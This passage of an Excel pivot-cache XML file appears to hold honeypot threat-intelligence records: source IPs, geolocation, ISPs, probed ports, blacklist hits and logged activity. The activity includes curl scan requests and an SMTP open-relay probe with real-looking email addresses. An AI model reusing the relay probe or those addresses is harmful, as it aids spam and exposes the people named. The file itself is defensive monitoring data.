MA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;NA&amp;&amp;28253&amp;&amp;9100&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="45"/>
    <s v="Jeollabuk-do"/>
    <s v="Muju-gun"/>
    <s v="Muju-gun (Muju-eup)"/>
    <s v="1840941"/>
    <s v="NA"/>
    <s v="36.0115"/>
    <s v="127.656"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Jeonbukbonbujang"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d8b:3aaf"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1167"/>
    <x v="1167"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T02:10:21"/>
    <d v="2024-04-05T11:42:00"/>
    <d v="2025-04-22T02:10:21"/>
    <n v="750"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;585&amp;&amp;44173&amp;&amp;44196&amp;&amp;44219&amp;&amp;44230&amp;&amp;44243&amp;&amp;44261&amp;&amp;NA&amp;&amp;9100&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Jeongja-dong)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3638"/>
    <s v="127.116"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="KORNET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dda4:ea13"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1168"/>
    <x v="1168"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T00:10:25"/>
    <d v="2024-11-23T01:12:43"/>
    <d v="2025-04-22T00:10:25"/>
    <n v="53"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;8382&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KZ"/>
    <s v="Kazakhstan"/>
    <s v="75"/>
    <s v="Almaty"/>
    <s v="Karasay District"/>
    <s v="Almaty"/>
    <s v="1526384"/>
    <s v="050000"/>
    <s v="43.238"/>
    <s v="76.8829"/>
    <s v="50482"/>
    <s v="JSC Kazakhtelecom"/>
    <s v="JSC Kazakhtelecom"/>
    <s v="business"/>
    <s v="TOO Ruslan LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5c2e:e73a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1169"/>
    <x v="1169"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-22T00:10:16"/>
    <d v="2025-02-10T05:17:49"/>
    <d v="2025-04-22T00:10:16"/>
    <n v="82"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H13"/>
    <s v="25&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="LI"/>
    <s v="Limburg"/>
    <s v="Kerkrade Municipality"/>
    <s v="Eygelshoven"/>
    <s v="2756285"/>
    <s v="6471"/>
    <s v="50.8956"/>
    <s v="6.06924"/>
    <s v="214940"/>
    <s v="KPROHOST LLC"/>
    <s v="Kprohost LLC"/>
    <s v="hosting"/>
    <s v="Pitline Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 9 Feb 2025 15:45:32 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 28 Feb 2025 02:52:16 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '156.244.37.11_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 16 Mar 2025 13:02:50 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 18 Mar 2025 10:15:04 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;test@test.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;officeofficez50@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;youngslim1997@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;rodneysmith@susquehanabk.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;rodney.smith2024@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;rodneysmith@susquehanabank.co&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;philipwlowe@workmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;joshuaboblin28@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '94.131.113.33_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 20 Mar 2025 11:18:44 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c3d3:bf50"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1170"/>
    <x v="1170"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T23:40:30"/>
    <d v="2024-11-22T07:08:07"/>
    <d v="2025-04-21T23:40:30"/>
    <n v="41"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23&amp;&amp;60111&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="YO"/>
    <s v="Yogyakarta"/>
    <s v="Kota Yogyakarta"/>
    <s v="Yogyakarta"/>
    <s v="1621177"/>
    <s v="NA"/>
    <s v="-7.79558"/>
    <s v="110.369"/>
    <s v="23671"/>
    <s v="PT. Sarana InsanMuda Selaras"/>
    <s v="Jogja Medianet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2002-07-16"/>
    <s v="JMN-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:caa9:ea31"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1171"/>
    <x v="1171"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T23:23:52"/>
    <d v="2024-11-27T11:59:54"/>
    <d v="2025-04-21T23:23:52"/>
    <n v="32"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H43"/>
    <s v="1433&amp;&amp;49931&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Trivandrum"/>
    <s v="Thiruvananthapuram (Technopark Campus)"/>
    <s v="1254163"/>
    <s v="695034"/>
    <s v="8.5581"/>
    <s v="76.8816"/>
    <s v="17465"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="residential"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="2000-08-08"/>
    <s v="ASIANET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.88.228.125,65322)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca58:e47d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1172"/>
    <x v="1172"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T21:05:54"/>
    <d v="2025-04-02T19:00:52"/>
    <d v="2025-04-21T21:05:54"/>
    <n v="13697"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H37&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;53929&amp;&amp;57886&amp;&amp;58524&amp;&amp;58661&amp;&amp;64077&amp;&amp;56161&amp;&amp;63219&amp;&amp;50378&amp;&amp;58235&amp;&amp;56170&amp;&amp;52376&amp;&amp;55880&amp;&amp;53163&amp;&amp;62585&amp;&amp;54236&amp;&amp;55924&amp;&amp;50786&amp;&amp;55746&amp;&amp;64764&amp;&amp;58447&amp;&amp;60076&amp;&amp;52880&amp;&amp;62686&amp;&amp;49158&amp;&amp;50491&amp;&amp;52417&amp;&amp;52655&amp;&amp;55613&amp;&amp;54164&amp;&amp;55892&amp;&amp;51230&amp;&amp;63321&amp;&amp;61939&amp;&amp;52948&amp;&amp;54725&amp;&amp;49581&amp;&amp;54020&amp;&amp;55542&amp;&amp;53850&amp;&amp;60590&amp;&amp;53926&amp;&amp;50186&amp;&amp;54572&amp;&amp;51390&amp;&amp;54231&amp;&amp;65508&amp;&amp;54745&amp;&amp;49189&amp;&amp;59028&amp;&amp;56824&amp;&amp;49803&amp;&amp;55507&amp;&amp;59623&amp;&amp;49567&amp;&amp;55357&amp;&amp;63829&amp;&amp;61781&amp;&amp;53397&amp;&amp;54613"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="WA"/>
    <s v="Washington"/>
    <s v="Spokane"/>
    <s v="Liberty Lake"/>
    <s v="5800870"/>
    <s v="99019"/>
    <s v="47.6743"/>
    <s v="-117.112"/>
    <s v="400304"/>
    <s v="Redoubt Networks"/>
    <s v="Redoubt Networks"/>
    <s v="business"/>
    <s v="Redoubt Networks"/>
    <s v="2022-02-01"/>
    <s v="CB-V4-02"/>
    <s v="2025-03-05"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d8b5:6bfb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1173"/>
    <x v="1173"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T19:18:49"/>
    <d v="2023-07-25T04:30:54"/>
    <d v="2025-04-21T19:18:49"/>
    <n v="1773"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_REDIS_H43&amp;&amp;SMA-LAB_HTTP_H41&amp;&amp;SMA-LAB_PJL_H25&amp;&amp;SMA-LAB_ORACLE_H43&amp;&amp;SMA-LAB_NTP_H18&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;5900&amp;&amp;6379&amp;&amp;80&amp;&amp;9100&amp;&amp;1521&amp;&amp;123&amp;&amp;1080&amp;&amp;143&amp;&amp;19248&amp;&amp;57734&amp;&amp;57678"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'spam']}"/>
    <n v="76"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kota Pasuruan"/>
    <s v="Pasuruan"/>
    <s v="1632033"/>
    <s v="NA"/>
    <s v="-7.64678"/>
    <s v="112.908"/>
    <s v="141965"/>
    <s v="Diskominfo Kota Pasuruan"/>
    <s v="Diskominfo Kota Pasuruan"/>
    <s v="business"/>
    <s v="Diskominfo Kota Pasuruan"/>
    <s v="2021-04-05"/>
    <s v="IDNIC-PSNKOTA-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a5:9a9a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1174"/>
    <x v="1174"/>
    <s v="NA&amp;&amp;static-176-166-13-99.ftth.abo.bbox.fr"/>
    <x v="0"/>
    <d v="2025-04-21T15:49:03"/>
    <d v="2025-01-19T12:05:54"/>
    <d v="2025-04-21T15:49:03"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="IDF"/>
    <s v="Île-de-France"/>
    <s v="Hauts-de-Seine"/>
    <s v="Nanterre"/>
    <s v="2990970"/>
    <s v="92000"/>
    <s v="48.8924"/>
    <s v="2.21533"/>
    <s v="5410"/>
    <s v="Bouygues Telecom SA"/>
    <s v="BOUYGUES Telecom"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2011-07-06"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2008-05-14 15:53:11"/>
    <s v="2025-07-10 14:10:29"/>
    <s v="2024-07-13 22:03:43"/>
    <s v="['ns1.bouyguesbox.fr', 'ns2.bouyguesbox.fr', 'nsa.perf1.fr', 'nsb.perf1.com', 'nsc.perf1.com']"/>
    <s v="NAMESHIELD"/>
    <s v="['ACTIVE', 'serverUpdateProhibited', 'serverTransferProhibited', 'serverDeleteProhibited', 'serverRecoverProhibited', 'associated', 'not identified']"/>
    <s v="NA"/>
    <x v="23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b0a6:d63"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1175"/>
    <x v="1175"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T11:15:11"/>
    <d v="2025-03-18T08:19:31"/>
    <d v="2025-04-21T11:15:11"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H3"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NO"/>
    <s v="Norway"/>
    <s v="03"/>
    <s v="Oslo"/>
    <s v="Oslo"/>
    <s v="Oslo"/>
    <s v="3143244"/>
    <s v="0001"/>
    <s v="59.9124"/>
    <s v="10.7742"/>
    <s v="41164"/>
    <s v="Telia Norge AS"/>
    <s v="Get AS"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bc71:569c"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1176"/>
    <x v="1176"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-21T11:01:11"/>
    <d v="2025-03-07T13:25:24"/>
    <d v="2025-04-21T11:01:11"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="17917"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="Hfcl Infotel LTD"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2010-06-17"/>
    <s v="ADSL_BROADBAND"/>
    <s v="None"/>
